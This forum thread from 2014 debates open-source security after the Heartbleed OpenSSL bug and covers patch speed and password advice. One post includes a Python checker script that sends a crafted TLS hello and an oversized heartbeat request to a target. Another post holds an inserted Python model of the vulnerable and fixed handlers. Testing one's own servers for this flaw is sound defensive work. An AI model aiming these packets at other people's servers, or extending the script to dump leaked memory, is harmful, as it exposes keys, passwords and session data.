
Heartbleed SSL exploit [CVE-2014-0160]

Discussion in 'Business & Enterprise Computing' started by HeXa, Apr 9, 2014.

  1. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    Not Trolling.

    The argument for the security of open source software (and why you can never trust closed source) that gets oft repeated goes something along the lines of

    "You can trust OpenSourceX because the source is open man, everyone has access to it... how could a TLA hide a backdoor in something that's open. Bugs like <insert whatever MS flavour of the week bug> cannot happen with Open Source because anyone can look at the source and fix it"

    and

    "You can't trust Microsoft, LOOK, there's a variable called _NSAKEY that contains a 1024-bit key, that must be the backdoor that the NSA put in so they can use your webcam to view your cat remotely. Sure, they say that the _NSAKEY is to ensure they comply with crypto-export guidelines, but you don't know man YOU JUST DON'T KNOW"

    So, to answer your question... XP Remote exploit bugs can be there for 10 years, because only BillyG (and his 4 friends) are allowed to see the code.

    My question was simply around the validity of the Open Source argument presented above.

    Bugs happen, but for something so widely in use to be overlooked by so many people, I just can't see the "It's safe because it's open" argument holding any weight whatsoever.
     
  2. silenthunter

    silenthunter Member

    Joined:
    Aug 29, 2002
    Messages:
    2,634
    Location:
    Amsterdam, Netherlands
    Here is a short python script you can use to test locally.

    Usage is python script.py URL

    Code:
    #!/usr/bin/python
    
    # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
    # The author disclaims copyright to this source code.
    
    # Modified for simplified checking by Yonathan Klijnsma
    
    import sys
    import struct
    import socket
    import time
    import select
    import re
    from optparse import OptionParser
    
    target = None
    
    options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
    options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
    
    def h2bin(x):
        return x.replace(' ', '').replace('\n', '').decode('hex')
    
    hello = h2bin('''
    16 03 02 00  dc 01 00 00 d8 03 02 53
    43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
    bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
    00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
    00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
    c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
    c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
    c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
    c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
    00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
    03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
    00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
    00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
    00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
    00 0f 00 01 01                                  
    ''')
    
    hb = h2bin(''' 
    18 03 02 00 03
    01 40 00
    ''')
    
    def hexdump(s):
        for b in xrange(0, len(s), 16):
            lin = [c for c in s[b : b + 16]]
            hxdat = ' '.join('%02X' % ord(c) for c in lin)
            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
            print '  %04x: %-48s %s' % (b, hxdat, pdat)
        print
    
    def recvall(s, length, timeout=5):
        endtime = time.time() + timeout
        rdata = ''
        remain = length
        while remain > 0:
            rtime = endtime - time.time() 
            if rtime < 0:
                return None
            r, w, e = select.select([s], [], [], 5)
            if s in r:
                data = s.recv(remain)
                # EOF?
                if not data:
                    return None
                rdata += data
                remain -= len(data)
        return rdata
            
    
    def recvmsg(s):
        hdr = recvall(s, 5)
        if hdr is None:
            return None, None, None
        typ, ver, ln = struct.unpack('>BHH', hdr)
        pay = recvall(s, ln, 10)
        if pay is None:
            return None, None, None
     
        return typ, ver, pay
    
    def hit_hb(s):
        global target
        s.send(hb)
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print target + '|NOT VULNERABLE'
                return False
    
            if typ == 24:
                if len(pay) > 3:
                    print target + '|VULNERABLE'
                else:
                    print target + '|NOT VULNERABLE'
                return True
    
            if typ == 21:
                print target + '|NOT VULNERABLE'
                return False
    
    def main():
        global target
        opts, args = options.parse_args()
        if len(args) < 1:
            options.print_help()
            return
    
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        target = args[0]
        sys.stdout.flush()
        s.send(hello)
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                return
            # Look for server hello done message.
            if typ == 22 and ord(pay[0]) == 0x0E:
                break
    
        sys.stdout.flush()
        s.send(hb)
        hit_hb(s)
    
    if __name__ == '__main__':
        main()
     
  3. HeXa (OP)

    HeXa Member

    Joined:
    Jul 7, 2001
    Messages:
    10,211
    Location:
    Canberra, ACT
    yep - Hanlon's Razor :p

    in their defence, C/C++ wasn't designed with memory safety in mind and it is up to the programmer (or committer) to ensure adequate checks are in place

    not that I mind, buffer overflows are very useful for jailbreaking :Pirate:
     
  4. Daemon

    Daemon Member

    Joined:
    Jun 27, 2001
    Messages:
    5,475
    Location:
    qld.au
    Quite easily, it's C code. Any program which combines memory mapping with something as complex as cryptography means an extreme amount of checks are required.

    It's nothing to do with open source at all, in fact if you compare the incidents with proprietary companies you'd see that it's just the same. Companies like Adobe, Apple, Microsoft, Oracle and so forth have all had many exploits involving improper memory handling. I'm sure we'll see multiples of them this year as well.

    http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html

    Have a read of the code. Did you spot the error? How long did it take you? Now, how long does it take if there's a few hundred thousand lines of code?

    Any software written by a human is prone to error. Using a programming language where you have to explicitly handle the memory allocation means bugs like this will exist as the complexity grows.

    Open source and responsible vendors meant that despite the nature of this bug, the fix can be validated and rolled out rapidly. Many could (and did) recompile the code with the fix for anything critical within minutes of the announcement. Vendors like Red Hat were only hours later.

    When was the last time that a fix was available that quick from Microsoft or Adobe?
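    The bug behind the linked diagnosis, and the reason silenthunter's script above treats any heartbeat reply to its 3-byte request (`01 40 00`, declared payload length 0x4000) as proof of vulnerability, modelled in Python. This is an added example, not code from the thread or from OpenSSL: the "heap" contents, the offsets and the two `*_respond` functions are constructed stand-ins for OpenSSL's heartbeat handler before and after the 1.0.1g fix.

```python
import struct

HB_REQUEST, HB_RESPONSE, PADDING = 1, 2, 16   # RFC 6520 message types; OpenSSL appends 16 bytes of padding

# Constructed stand-in for the server's heap: the 3-byte heartbeat body sent by the script
# above (type 01, declared payload length 0x4000 = 16384 bytes) followed by unrelated data.
RECORD = bytes.fromhex('01 40 00')
HEAP = RECORD + b'<unrelated heap data: session cookie=CONSTRUCTED-SECRET>'

def parse_header(record):
    """Heartbeat header: 1-byte type, 2-byte big-endian payload_length (RFC 6520)."""
    return struct.unpack('>BH', record[:3])

def vulnerable_respond(heap, offset, record_len):
    """Model of OpenSSL's heartbeat handler before 1.0.1g: payload_len comes from the
    peer-controlled header and is never compared with the number of bytes received."""
    hb_type, payload_len = parse_header(heap[offset:offset + record_len])
    if hb_type != HB_REQUEST:
        return None
    start = offset + 3                          # pl points just past the header
    leaked = heap[start:start + payload_len]    # memcpy(bp, pl, payload) reads on past the record
    return struct.pack('>BH', HB_RESPONSE, payload_len) + leaked + bytes(PADDING)

def fixed_respond(heap, offset, record_len):
    """Model of the 1.0.1g fix: bounds checks before any copy; bad messages are dropped."""
    if record_len < 1 + 2 + PADDING:            # too short even for an empty payload
        return None
    hb_type, payload_len = parse_header(heap[offset:offset + record_len])
    if hb_type != HB_REQUEST:
        return None
    if 1 + 2 + payload_len + PADDING > record_len:
        return None                             # declared length exceeds what arrived
    payload = heap[offset + 3:offset + 3 + payload_len]
    return struct.pack('>BH', HB_RESPONSE, payload_len) + payload + bytes(PADDING)

def looks_vulnerable(response):
    """The script's rule: a patched server can only answer a 3-byte request with silence
    (or an alert), so any heartbeat reply longer than its header is leaked memory."""
    return response is not None and len(response) > 3

if __name__ == '__main__':
    for name, fn in (('unpatched', vulnerable_respond), ('patched', fixed_respond)):
        reply = fn(HEAP, 0, len(RECORD))
        print(name, 'VULNERABLE' if looks_vulnerable(reply) else 'NOT VULNERABLE', reply)
```

A well-formed heartbeat (declared length matching the bytes actually sent, plus padding) still gets its payload echoed by `fixed_respond`, which is the behaviour the check is meant to preserve.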
     
  5. NSanity

    NSanity Member

    Joined:
    Mar 11, 2002
    Messages:
    18,647
    Location:
    Brisbane
    Umm, quite frequently?

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

    Date Entry Created - 2013 12 03

    Yep, 4 months.

    Sure that date might not actually be when it was first found - but you can bet that the major players have known about it much longer than 2 days.
     
  6. Daemon

    Daemon Member

    Joined:
    Jun 27, 2001
    Messages:
    5,475
    Location:
    qld.au
    In case you missed the massive disclaimer beside the date, here it is again:

    CVEs are reserved in advance. E.g. look up CVE-2014-0250 (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0250) and you'll see the same date reserved. Of course, if you've ever monitored CVEs properly this is all fairly obvious...

    Now as to an affected vendor response. Here's the Red Hat bug: https://bugzilla.redhat.com/show_bug.cgi?id=1084875

    Reported: 2014-04-07 01:56:04 EDT
    Patched: 2014-04-07 02:14:33 EDT
    Released: 2014-04-07 13:43:21 EDT

    I think that the performance is fairly self explanatory.

    Edit: Just to compare to the recent vulnerabilities from Microsoft and Adobe. Microsoft have just released two critical patches, one of which is already out in the wild (CVE-2014-1761) and that they've known about for weeks. Adobe just released the patch for one of the priority 1 exploits discovered during Pwn2Own a month ago. Both are the highest rating for severity.
     
    Last edited: Apr 10, 2014
  7. elvis

    elvis OCAU's most famous and arrogant know-it-all

    Joined:
    Jun 27, 2001
    Messages:
    46,805
    Location:
    Brisbane
    The same way bugs everywhere else go undiscovered - people make assumptions and/or mistakes.

    There are outliers in every case. This is one.

    Compare and contrast the volume of critical bugs that are patched much more quickly, which never make the news because they're dealt with quickly and efficiently. Now compare that in open source versus proprietary systems - over the last 10 years I could name dozens of scary bugs in Windows that left it wide open for months at a time.

    "Open source" doesn't guarantee "bug free". That assumption is just silly. But on average, open source does a much better job with respect to security than proprietary systems do, even when you include rare instances like this one.

    Additionally, this is why open source has competing projects. People complain a lot about there being too many options in open source. "Why do we need GNUTLS as well as OpenSSL?" asks the newbie. Well, here's a great example why.

    One has to be pragmatic about all software. Open source is not perfect, and there have been some notable fuckups in the past (Debian's "random seed" SSH bug a few years back, for example). But I'd still bet my career on open source over proprietary for any serious Internet-facing requirement, based purely on numbers over the last decade.
     
  8. scrantic

    scrantic Member

    Joined:
    Apr 8, 2002
    Messages:
    1,780
    Location:
    3350
  9. power

    power Member

    Joined:
    Apr 20, 2002
    Messages:
    68,463
    Location:
    brisbane
    This site keeps updating, well worth keeping an eye on.

    http://www.cnet.com/how-to/which-sites-have-patched-the-heartbleed-bug/

    The list is growing.

    Dropbox Pass Vulnerability patched. Password change recommended

    Flickr Pass Vulnerability patched. Password change recommended

    Vimeo Pass Vulnerability patched. Password change recommended

    GoDaddy Pass Vulnerability patched. Password change recommended

    Reddit Pass Vulnerability patched. Password change recommended

    Instagram Pass Vulnerability patched. Password change recommended

    Tumblr Pass Vulnerability patched. Password change recommended

    Wikipedia Pass Vulnerability patched. Password change recommended
     
    Last edited: Apr 11, 2014
  10. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    To play Devil's Advocate/PHB...

    Open source lets anyone search the source for bugs.
    Who is looking harder for bugs in old code...

    The developers who are more interested in implementing new features, than bug checking old code.

    ShadyGuystm who, upon finding a bug, can exploit it for fun and profit.

    If you report the bug, you might get a bounty and some kudos from the community, if you sell or exploit the bug, you get hookers and blow.

    Open source makes it trivial for ShadyGuystm to find and exploit bugs, and that's why we can't use it in PHBCorp. We will stick with our closed source solutions... that way, at least ShadyGuystm won't be handed the code on a plate.
     
  11. power

    power Member

    Joined:
    Apr 20, 2002
    Messages:
    68,463
    Location:
    brisbane
    I hate open source, because hackers.
     
  12. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    Did... did you just advocate for security through obscurity? :lol:
     
  13. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    As I said, Pointy Haired Boss hat on...
    It's a pretty common opinion (regardless of the truth or not behind it) that needs to be overcome if I want to implement any open source things in the future.

    Out of all our systems here, an appliance built on CentOS is the only one that was vulnerable... so yes, this is a setback to any future attempts at implementing open source in my environment.

    It's certainly a layer of security... so yes, I guess I did.

    Something that is obscure, is more secure than that same something that is not obscure. (completely separate to the inherent security of said 'something')
     
  14. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    I wholeheartedly disagree on that point, to be honest. What about MS08-067? What about the raft of other Microsoft bugs that have come out of obscure, closed source or poorly documented APIs.

    SCADA vulnerabilities, Stuxnet, etc.

    The point I'm making is that one security vulnerability is hardly a reason to say that the FOSS model is inherently insecure, certainly no more than any other closed source model.

    Unfortunately when you're dealing with complex code (which this was) mistakes can be made that no one is going to notice.

    I get it's a pointy haired opinion, but the only way to move through that is with a sensible discussion.
     
  15. cbb1935

    cbb1935 Guest

    You'll have to excuse my layman's comment.

    So if sites like Facebook and Dropbox are vulnerable, and now patched, is anything required from a user perspective, and what's the risk of not changing passwords if the account is rarely used (or is that precautionary?).

    On another note, looks like a major site we use is affected, and no indication when it'll be patched. Looks like I have to tell some people they can't work.
     
  16. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    My understanding is if someone captured the encrypted traffic where you authenticated to facebook, then they could decrypt it and retrieve your password.
     
  17. power

    power Member

    Joined:
    Apr 20, 2002
    Messages:
    68,463
    Location:
    brisbane
    From a layman's perspective you need to know this.

    Ars were aware of the bug due to suspicious activity.

    Dear readers, please change your Ars account passwords ASAP

     
  18. Daemon

    Daemon Member

    Joined:
    Jun 27, 2001
    Messages:
    5,475
    Location:
    qld.au
    In fact, one of the strong reasons open source code is useful is when there is a bug. Instead of having to wait for a vendor to correct the problem it can be either fixed in-house (and a patch submitted upstream) or other companies and developers may come up with a fix. This collaboration is what makes open source strong.

    The same goes for new feature requests: if you contact a vendor and ask for a feature to be added then you're at the whim of their schedule and what they determine to be a priority. If the code is open source then it gives you the flexibility to either develop the feature in-house or contract a developer to complete it for you.

    And yes, I have (albeit on smaller codebases) forked code, fixed a bug or added a new feature and submitted this upstream. With systems like GitHub, Bitbucket and similar it makes it quite a simple task. The more advanced projects have automated testing via systems like Travis CI, so you can't submit the patch before it's fully tested and working too!
     
  19. millsy

    millsy Member

    Joined:
    Mar 31, 2007
    Messages:
    14,046
    Location:
    Brisbane
    Indeed, the process of patching for a lot of places has been staggeringly fast.
     
  20. PabloEscobar

    PabloEscobar Member

    Joined:
    Jan 28, 2008
    Messages:
    14,678
    Trust, but Verify is how I view the FOSS model. This bug demonstrates that there was too much trust, and too little verification. Everyone assumed OpenSSL was safe, because everyone else was using it.

    Most companies don't have the resources to do a full audit of every line of code in their environment; reliance on closed source outsources that responsibility.
     
